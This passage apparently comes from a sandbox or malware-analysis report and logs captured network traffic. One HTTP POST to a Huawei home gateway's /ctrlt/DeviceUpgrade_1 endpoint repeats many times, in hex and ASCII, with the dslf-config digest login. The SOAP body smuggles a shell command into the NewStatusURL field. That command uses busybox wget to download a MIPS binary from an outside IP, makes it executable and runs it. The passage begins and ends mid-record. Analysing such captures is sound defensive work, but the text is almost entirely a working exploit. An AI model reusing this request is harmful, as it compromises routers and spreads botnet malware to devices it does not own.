-l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 